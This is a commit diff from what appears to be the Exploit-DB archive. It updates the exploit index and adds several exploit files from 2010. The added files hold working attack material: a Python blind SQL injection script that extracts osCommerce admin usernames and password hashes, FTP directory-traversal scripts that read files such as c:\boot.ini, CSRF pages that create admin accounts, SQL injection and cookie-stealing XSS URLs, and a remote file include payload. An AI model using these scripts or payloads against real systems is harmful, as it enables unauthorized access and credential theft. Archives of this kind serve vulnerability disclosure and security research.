21733,platforms/linux/local/21733.sh,"Sun Cobalt RaQ 4.0 Predictable Temporary Filename Symbolic Link Attack Vulnerability",2002-06-28,"Charles Stevenson",linux,local,0
|
||||
21734,platforms/unix/remote/21734.txt,"Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability",2002-08-21,Skinnay,unix,remote,0
|
||||
21735,platforms/windows/remote/21735.txt,"Abyss Web Server 1.0 Encoded Backslash Directory Traversal Vulnerability",2002-08-22,"Auriemma Luigi",windows,remote,0
|
||||
|
@ -22999,7 +22999,7 @@ id,file,description,date,author,platform,type,port
|
|||
25909,platforms/php/webapps/25909.txt,"Mensajeitor 1.8.9 IP Parameter HTML Injection Vulnerability",2005-06-27,Megabyte,php,webapps,0
|
||||
25910,platforms/asp/webapps/25910.txt,"Community Server Forums 'SearchResults.aspx' Cross-Site Scripting Vulnerability",2005-06-28,abducter_minds@yahoo.com,asp,webapps,0
|
||||
25911,platforms/windows/dos/25911.py,"BisonFTP 4R1 - Remote Denial of Service Vulnerability",2005-06-28,fRoGGz,windows,dos,0
|
||||
25912,platforms/windows/local/25912.c,"Windows NT - Windows 8 EPATHOBJ Local Ring 0 Exploit",2013-06-03,"Tavis Ormandy",windows,local,0
|
||||
25912,platforms/windows/local/25912.c,"Windows NT/2K/XP/2K3/Vista/2K8/7/8 - EPATHOBJ Local Ring 0 Exploit",2013-06-03,"Tavis Ormandy",windows,local,0
|
||||
25913,platforms/asp/webapps/25913.txt,"Hosting Controller 6.1 Error.ASP Cross-Site Scripting Vulnerability",2005-06-28,"Ashiyane Digital Security Team",asp,webapps,0
|
||||
25914,platforms/asp/webapps/25914.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 Login.ASP SQL Injection Vulnerability",2005-06-28,basher13,asp,webapps,0
|
||||
25915,platforms/php/webapps/25915.py,"PHD Help Desk 2.12 - SQL Injection Vulnerability",2013-06-03,drone,php,webapps,0
|
||||
|
@ -30503,7 +30503,7 @@ id,file,description,date,author,platform,type,port
|
|||
33863,platforms/hardware/remote/33863.rb,"D-Link hedwig.cgi Buffer Overflow in Cookie Header",2014-06-24,metasploit,hardware,remote,80
|
||||
33865,platforms/linux/remote/33865.rb,"AlienVault OSSIM av-centerd Command Injection",2014-06-24,metasploit,linux,remote,40007
|
||||
33866,platforms/hardware/webapps/33866.html,"Thomson TWG87OUIR - POST Password CSRF",2014-06-25,nopesled,hardware,webapps,0
|
||||
33867,platforms/php/webapps/33867.txt,"Lunar CMS 3.3 Unauthenticated Remote Command Execution Exploit",2014-06-25,LiquidWorm,php,webapps,0
|
||||
33867,platforms/php/webapps/33867.txt,"Lunar CMS 3.3 - Unauthenticated Remote Command Execution Exploit",2014-06-25,LiquidWorm,php,webapps,0
|
||||
33868,platforms/multiple/remote/33868.txt,"Apache ActiveMQ 5.2/5.3 Source Code Information Disclosure Vulnerability",2010-04-22,"Veerendra G.G",multiple,remote,0
|
||||
33869,platforms/hardware/remote/33869.txt,"Huawei EchoLife HG520 3.10.18.5-1.0.5.0 - Remote Information Disclosure Vulnerability",2010-04-22,hkm,hardware,remote,0
|
||||
33870,platforms/php/webapps/33870.txt,"FlashCard 2.6.5 'id' Parameter Cross Site Scripting Vulnerability",2010-04-22,Valentin,php,webapps,0
|
||||
|
@ -30660,3 +30660,15 @@ id,file,description,date,author,platform,type,port
|
|||
34044,platforms/php/webapps/34044.txt,"md5 Encryption Decryption PHP Script 'index.php' Cross Site Scripting Vulnerability",2010-05-26,indoushka,php,webapps,0
|
||||
34045,platforms/php/webapps/34045.txt,"BackLinkSpider 1.3.1774 'cat_id' Parameter SQL Injection Vulnerability",2010-05-27,"sniper ip",php,webapps,0
|
||||
34046,platforms/php/webapps/34046.txt,"BackLinkSpider 1.3.1774 Multiple Cross Site Scripting Vulnerabilities",2010-05-27,"sniper ip",php,webapps,0
|
||||
34047,platforms/windows/remote/34047.html,"Home FTP Server 1.10.3 (build 144) Cross Site Request Forgery Vulnerability",2010-05-26,"John Leitch",windows,remote,0
|
||||
34048,platforms/multiple/remote/34048.html,"Brekeke PBX 2.4.4.8 'pbx/gate' Cross Site Request Forgery Vulnerability",2010-05-26,"John Leitch",multiple,remote,0
|
||||
34049,platforms/php/webapps/34049.txt,"Layout CMS 1.0 SQL-Injection and Cross-Site Scripting Vulnerabilities",2010-01-12,Red-D3v1L,php,webapps,0
|
||||
34050,platforms/windows/remote/34050.py,"Home FTP Server 1.10.2.143 Directory Traversal Vulnerability",2010-05-27,"John Leitch",windows,remote,0
|
||||
34051,platforms/windows/dos/34051.py,"Core FTP Server 1.0.343 Directory Traversal Vulnerability",2010-05-28,"John Leitch",windows,dos,0
|
||||
34052,platforms/php/webapps/34052.py,"osCommerce Visitor Web Stats Add-On 'Accept-Language' Header SQL Injection Vulnerability",2010-05-28,"Christopher Schramm",php,webapps,0
|
||||
34053,platforms/php/webapps/34053.txt,"ImpressPages CMS 1.0x 'admin.php' Multiple SQL Injection Vulnerabilities",2010-05-28,"High-Tech Bridge SA",php,webapps,0
|
||||
34054,platforms/php/webapps/34054.txt,"GR Board 1.8.6 'page.php' Remote File Include Vulnerability",2010-05-30,eidelweiss,php,webapps,0
|
||||
34055,platforms/php/webapps/34055.txt,"CMScout <= 2.08 Cross Site Scripting Vulnerability",2010-05-28,XroGuE,php,webapps,0
|
||||
34056,platforms/php/webapps/34056.txt,"Joomla! 1.5.x Multiple Modules 'search' Parameter Cross-Site Scripting Vulnerabilities",2010-05-28,"Riyaz Ahemed Walikar",php,webapps,0
|
||||
34057,platforms/php/webapps/34057.txt,"wsCMS 'news.php' Cross Site Scripting Vulnerability",2010-05-31,cyberlog,php,webapps,0
|
||||
34058,platforms/multiple/dos/34058.txt,"DM Database Server 'SP_DEL_BAK_EXPIRED' Memory Corruption Vulnerability",2010-05-31,"Shennan Wang HuaweiSymantec SRT",multiple,dos,0
|
||||
|
|
Can't render this file because it is too large.
|
9
platforms/multiple/dos/34058.txt
Executable file
9
platforms/multiple/dos/34058.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/40460/info
|
||||
|
||||
DM Database Server is a database application.
|
||||
|
||||
DM Database Server is prone to a remote memory-corruption vulnerability. This issue affects the 'CALL SP_DEL_BAK_EXPIRED' function when a large string is passed to the first argument.
|
||||
|
||||
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
|
||||
|
||||
CALL SP_DEL_BAK_EXPIRED('AAAAAAAAAAAAAAAAAAAA', '');
|
9
platforms/multiple/remote/34048.html
Executable file
9
platforms/multiple/remote/34048.html
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/40407/info
|
||||
|
||||
Brekeke PBX is prone to a cross-site request-forgery vulnerability.
|
||||
|
||||
Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected application. Other attacks are also possible.
|
||||
|
||||
Brekeke PBX 2.4.4.8 is vulnerable; other versions may be affected.
|
||||
|
||||
<html> <body> <img src="http://www.example.com:28080/pbx/gate?bean=pbxadmin.web.PbxUserEdit&user=sa&disabled=false&name=&language=en&password=new_password&password2=new_password&phoneforward=&ringertime=60&noanswerforward=vmsa&noanswerforward.voicemail=on&busyforward=vmsa&busyforward.voicemail=on&dtmfcommand=true&defaultpickup=&index=1&greetingtype=3&recordlength=&messageforward=&email=&emailnotification=true&emailattachment=true&admin=true&userplugin=user&personalivr=&rtprelay=default&payload=&useremotepayload=default&recording=false&canjoin=true&allowjoin=true&aotomonitor=&maxsessioncount=-1&resourcemap=&operation=store" /> </body> </html>
|
10
platforms/php/webapps/34049.txt
Executable file
10
platforms/php/webapps/34049.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/40415/info
|
||||
|
||||
Layout CMS is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
Layout CMS 1.0 is vulnerable; other versions may be affected.
|
||||
|
||||
http://www.example.com/preview.php?id=-1+union+select+1,2,concat%28pass,0x3e,uname%29,4,5,6,7,8,9,10+from+layout_demo.users
|
||||
http://www.example.com/preview.php?id=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E
|
95
platforms/php/webapps/34052.py
Executable file
95
platforms/php/webapps/34052.py
Executable file
|
@ -0,0 +1,95 @@
|
|||
source: http://www.securityfocus.com/bid/40425/info
|
||||
|
||||
osCommerce Visitor Web Stats is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
import sys
|
||||
import http.client
|
||||
|
||||
if len(sys.argv) < 2:
|
||||
print("usage: " + sys.argv[0] + " <host> [<path>]")
|
||||
sys.exit();
|
||||
|
||||
host = sys.argv[1]
|
||||
if len(sys.argv) > 2:
|
||||
path = sys.argv[2]
|
||||
else:
|
||||
path = "/"
|
||||
|
||||
def req(lang):
|
||||
c = http.client.HTTPConnection(host)
|
||||
c.request('GET', path, '', {'Accept-Language': lang})
|
||||
return c.getresponse().read();
|
||||
|
||||
def check(condition):
|
||||
r = req("' AND 1=0 UNION SELECT id FROM administrators " + condition
|
||||
+ " -- '")
|
||||
if r.find(b'update') != -1:
|
||||
return 1;
|
||||
elif r.find(b'Unknown column') != -1:
|
||||
print('Unknown database structure (no rc version?)')
|
||||
sys.exit();
|
||||
return 0;
|
||||
|
||||
if req("'").find(b'select counter FROM visitors where browser_ip') == -1:
|
||||
print('Target does not seem to have (a vulnarable version of)
|
||||
Visitor Web Stats or doesn\'t output any error messages')
|
||||
sys.exit();
|
||||
|
||||
admin_count = 1
|
||||
while not check("HAVING COUNT(*) = " + str(admin_count)):
|
||||
admin_count += 1;
|
||||
print("Number of admins: " + str(admin_count))
|
||||
|
||||
pw_chars = [x for x in range(48, 58)]
|
||||
pw_chars.extend([x for x in range(97, 103)])
|
||||
pw_chars.sort()
|
||||
|
||||
todo = [('', 0, 255)]
|
||||
while len(todo):
|
||||
(found, start, end) = todo.pop()
|
||||
if start == 0 and end == 255 and check("WHERE user_name = '" + found
|
||||
+ "'"):
|
||||
sys.stdout.write(found + " ")
|
||||
sys.stdout.flush()
|
||||
for i in range(35):
|
||||
if i == 32:
|
||||
sys.stdout.write(":")
|
||||
sys.stdout.flush()
|
||||
continue
|
||||
pw_start, pw_end = 0, len(pw_chars) - 1
|
||||
while pw_start != pw_end:
|
||||
pw_mid = int((pw_start + pw_end) / 2)
|
||||
if check("WHERE user_name = '" + found + "'
|
||||
AND ORD(SUBSTRING(user_password, " + str(i + 1) + ", 1)) <= " +
|
||||
str(pw_chars[pw_mid])):
|
||||
pw_end = pw_mid
|
||||
else:
|
||||
if pw_mid == pw_end - 1:
|
||||
pw_start = pw_end
|
||||
else:
|
||||
pw_start = pw_mid
|
||||
sys.stdout.write(chr(pw_chars[pw_start]))
|
||||
sys.stdout.flush()
|
||||
print()
|
||||
if not check("WHERE SUBSTRING(user_name, 1, " +
|
||||
str(len(found)) + ") = '" + found + "' AND SUBSTRING(user_name, " +
|
||||
str(len(found) + 1) + ", 1) > 0"):
|
||||
continue;
|
||||
mid = int((start + end) / 2)
|
||||
if check("WHERE SUBSTRING(user_name, 1, " + str(len(found)) + ") =
|
||||
'" + found + "' AND ORD(SUBSTRING(user_name, " + str(len(found) + 1) + ",
|
||||
1)) <= " + str(mid) + " AND ORD(SUBSTRING(user_name, " + str(len(found) + 1)
|
||||
+ ", 1)) > 0"):
|
||||
if mid == start + 1:
|
||||
todo.append((found + chr(mid), 0, 255))
|
||||
else:
|
||||
todo.append((found, start, mid))
|
||||
if check("WHERE SUBSTRING(user_name, 1, " + str(len(found)) + ") =
|
||||
'" + found + "' AND ORD(SUBSTRING(user_name, " + str(len(found) + 1) + ",
|
||||
1)) > " + str(mid)):
|
||||
if mid == end - 1:
|
||||
todo.append((found + chr(end), 0, 255))
|
||||
else:
|
||||
todo.append((found, mid, end))
|
13
platforms/php/webapps/34053.txt
Executable file
13
platforms/php/webapps/34053.txt
Executable file
|
@ -0,0 +1,13 @@
|
|||
source: http://www.securityfocus.com/bid/40431/info
|
||||
|
||||
ImpressPages CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
ImpressPages CMS 1.0.4 is vulnerable; prior versions may also be affected.
|
||||
|
||||
The following example URIs are available:
|
||||
|
||||
http://www.example.com/admin.php?module_id=329&security_token=$valid_token&page[0]=&page_size[0]=200+ANY_SQL_HERE+--++
|
||||
|
||||
http://www.example.com/admin.php?module_id=329&security_token=$valid_token&sort_field[1]=&email+ANY_SQL_HERE+--+&sort_dir[1]=asc
|
9
platforms/php/webapps/34054.txt
Executable file
9
platforms/php/webapps/34054.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/40437/info
|
||||
|
||||
GR Board is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
|
||||
|
||||
This issue affects version 1.8.6.1; other versions may also be vulnerable.
|
||||
|
||||
http://www.example.com/path/page.php?theme=http://attacker's site
|
8
platforms/php/webapps/34055.txt
Executable file
8
platforms/php/webapps/34055.txt
Executable file
|
@ -0,0 +1,8 @@
|
|||
source: http://www.securityfocus.com/bid/40442/info
|
||||
|
||||
CMScout is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
The following example input to the 'search' field is available:
|
||||
<marquee><font color=Blue size=15>XroGuE</font></marquee>
|
29
platforms/php/webapps/34056.txt
Executable file
29
platforms/php/webapps/34056.txt
Executable file
|
@ -0,0 +1,29 @@
|
|||
source: http://www.securityfocus.com/bid/40444/info
|
||||
|
||||
Joomla! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
The issue affects Joomla! versions prior to 1.5.18.
|
||||
|
||||
http://www.example.com/administrator/index.php?option=com_users&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_users&search=%22%20onmousemove=%22javascript:window.location.assign%28%27http://www.example.com%27%29%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_trash&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_content&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_sections&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_categories&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_frontpage&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_menus&task=view&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_messages&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_banners&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_banners&c=client&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_categories§ion=com_banner&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_contact&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_categories§ion=com_contact_details&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_newsfeeds&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_categories§ion=com_newsfeeds&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_poll&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_weblinks&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_categories§ion=com_weblinks&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_modules&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
||||
http://www.example.com/administrator/index.php?option=com_plugins&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
|
7
platforms/php/webapps/34057.txt
Executable file
7
platforms/php/webapps/34057.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/40447/info
|
||||
|
||||
wsCMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
http://www.example.com/news.php?id=<script><font color=red size=15>XSS</font></script>
|
74
platforms/windows/dos/34051.py
Executable file
74
platforms/windows/dos/34051.py
Executable file
|
@ -0,0 +1,74 @@
|
|||
source: http://www.securityfocus.com/bid/40422/info
|
||||
|
||||
Core FTP Server is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
Exploiting this issue will allow an attacker to view arbitrary local files within the context of the webserver. Information harvested may aid in launching further attacks.
|
||||
|
||||
Core FTP Server 1.0.343 is vulnerable; other versions may also be affected.
|
||||
|
||||
import sys, socket, re
|
||||
|
||||
host = 'localhost'
|
||||
port = 21
|
||||
user = 'anonymous'
|
||||
password = 'a'
|
||||
|
||||
buffer_size = 8192
|
||||
timeout = 8
|
||||
|
||||
def recv(s):
|
||||
resp = ''
|
||||
|
||||
while 1:
|
||||
r = s.recv(buffer_size)
|
||||
if not r: break
|
||||
resp += r
|
||||
|
||||
return resp
|
||||
|
||||
def list_root():
|
||||
try:
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((host, port))
|
||||
s.settimeout(timeout)
|
||||
|
||||
print s.recv(buffer_size)
|
||||
|
||||
s.send('USER ' + user + '\r\n')
|
||||
print s.recv(buffer_size)
|
||||
|
||||
s.send('PASS ' + password + '\r\n')
|
||||
print s.recv(buffer_size) + s.recv(buffer_size)
|
||||
|
||||
s.send('CWD ' + '/...' * 16 + '\r\n')
|
||||
|
||||
resp = s.recv(buffer_size)
|
||||
|
||||
print resp
|
||||
|
||||
if resp[:3] == '250':
|
||||
s.send('PASV\r\n')
|
||||
resp = s.recv(buffer_size)
|
||||
|
||||
print resp
|
||||
|
||||
pasv_info = re.search(u'(\d+),(\d+),(\d+),(\d+),(\d+),(\d+)', resp)
|
||||
|
||||
if (pasv_info == None):
|
||||
print 'Invalid PASV response: ' + resp
|
||||
return
|
||||
|
||||
s.send('LIST\r\n')
|
||||
|
||||
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s2.connect((host, int(pasv_info.group(5)) * 256 + int(pasv_info.group(6))))
|
||||
s2.settimeout(timeout)
|
||||
|
||||
print recv(s2)
|
||||
|
||||
s.close()
|
||||
|
||||
except Exception:
|
||||
print sys.exc_info()
|
||||
|
||||
list_root()
|
9
platforms/windows/remote/34047.html
Executable file
9
platforms/windows/remote/34047.html
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/40405/info
|
||||
|
||||
Home FTP Server is prone to a cross-site request-forgery vulnerability.
|
||||
|
||||
Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected application. Other attacks are also possible.
|
||||
|
||||
Home FTP Server 1.10.3 (build 144) is vulnerable; other versions may be affected.
|
||||
|
||||
<html> <body> <img src="http://www.example.com/?addnewmember=new_user&pass=Password1&home=c:\&allowdownload=on&allowupload=on&allowrename=on&allowdeletefile=on&allowchangedir=on&allowcreatedir=on&allowdeletedir=on&virtualdir=&filecontrol=" /> </body> </html>
|
111
platforms/windows/remote/34050.py
Executable file
111
platforms/windows/remote/34050.py
Executable file
|
@ -0,0 +1,111 @@
|
|||
source: http://www.securityfocus.com/bid/40419/info
|
||||
|
||||
Home FTP Server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
Exploiting this issue can allow an attacker to download, upload, and delete arbitrary files outside of the FTP server's root directory. This may aid in further attacks.
|
||||
|
||||
Home FTP Server 1.10.2.143 and 1.11.1.149 are vulnerable; other versions may also be affected.
|
||||
|
||||
#============================================================================================================#
|
||||
# _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ #
|
||||
# /_/\ /\_\ /\_\ /\_\ /\_\ /\_______)\ ) ___ ( /_/\__/\ ) ___ ( /_/\ /\_\ /\_____\/_/\__/\ #
|
||||
# ) ) )( ( ( \/_/( ( ( ( ( ( \(___ __\// /\_/\ \ ) ) ) ) )/ /\_/\ \ ) ) )( ( (( (_____/) ) ) ) ) #
|
||||
# /_/ //\\ \_\ /\_\\ \_\ \ \_\ / / / / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/ #
|
||||
# \ \ / \ / // / // / /__ / / /__ ( ( ( \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ / \ / // /__/_\ \ \ \ \ #
|
||||
# )_) /\ (_(( (_(( (_____(( (_____( \ \ \ \ \/_\/ / )_) ) \ \/_\/ / )_) /\ (_(( (_____\)_) ) \ \ #
|
||||
# \_\/ \/_/ \/_/ \/_____/ \/_____/ /_/_/ )_____( \_\/ )_____( \_\/ \/_/ \/_____/\_\/ \_\/ #
|
||||
# #
|
||||
#============================================================================================================#
|
||||
# #
|
||||
# Vulnerability............Directory Traversal #
|
||||
# Software.................Home FTP Server 1.10.2.143 #
|
||||
# Download.................http://downstairs.dnsalias.net/files/HomeFtpServerInstall.exe #
|
||||
# Date.....................5/27/10 #
|
||||
# #
|
||||
#============================================================================================================#
|
||||
# #
|
||||
# Site.....................http://cross-site-scripting.blogspot.com/ #
|
||||
# Email....................john.leitch5@gmail.com #
|
||||
# #
|
||||
#============================================================================================================#
|
||||
# #
|
||||
# ##Description## #
|
||||
# #
|
||||
# A directory traversal vulnerability in Home FTP Server 1.10.2.143 can be exploited to read, write, and #
|
||||
# delete files outside of the ftp root directory. #
|
||||
# #
|
||||
# #
|
||||
# ##Exploit## #
|
||||
# #
|
||||
# RETR [Drive Letter]:\[Filename] #
|
||||
# STOR [Drive Letter]:\[Filename] #
|
||||
# DELE [Drive Letter]:\[Filename] #
|
||||
# #
|
||||
# #
|
||||
# ##Proof of Concept## #
|
||||
# #
|
||||
import sys, socket, re
|
||||
|
||||
host = 'localhost'
|
||||
port = 21
|
||||
user = 'anonymous'
|
||||
password = ''
|
||||
|
||||
timeout = 8
|
||||
|
||||
buffer_size = 8192
|
||||
|
||||
def get_data_port(s):
|
||||
s.send('PASV\r\n')
|
||||
|
||||
resp = s.recv(buffer_size)
|
||||
|
||||
pasv_info = re.search(u'(\d+),' * 5 + u'(\d+)', resp)
|
||||
|
||||
if (pasv_info == None):
|
||||
raise Exception(resp)
|
||||
|
||||
return int(pasv_info.group(5)) * 256 + int(pasv_info.group(6))
|
||||
|
||||
def retr_file(s, filename):
|
||||
pasv_port = get_data_port(s)
|
||||
|
||||
if (pasv_port == None):
|
||||
return None
|
||||
|
||||
s.send('RETR ' + filename + '\r\n')
|
||||
resp = s.recv(8192)
|
||||
|
||||
if resp[:3] != '150': raise Exception(resp)
|
||||
|
||||
print resp
|
||||
|
||||
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s2.connect((host, pasv_port))
|
||||
s2.settimeout(2.0)
|
||||
resp = s2.recv(8192)
|
||||
s2.close()
|
||||
|
||||
return resp
|
||||
|
||||
def get_file(filename):
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((host, port))
|
||||
s.settimeout(timeout)
|
||||
|
||||
print s.recv(buffer_size)
|
||||
|
||||
s.send('USER ' + user + '\r\n')
|
||||
print s.recv(buffer_size)
|
||||
|
||||
s.send('PASS ' + password + '\r\n')
|
||||
print s.recv(buffer_size)
|
||||
|
||||
print retr_file(s, filename)
|
||||
|
||||
print s.recv(buffer_size)
|
||||
|
||||
s.close()
|
||||
|
||||
get_file('c:\\boot.ini')
|
||||
|
Loading…
Add table
Reference in a new issue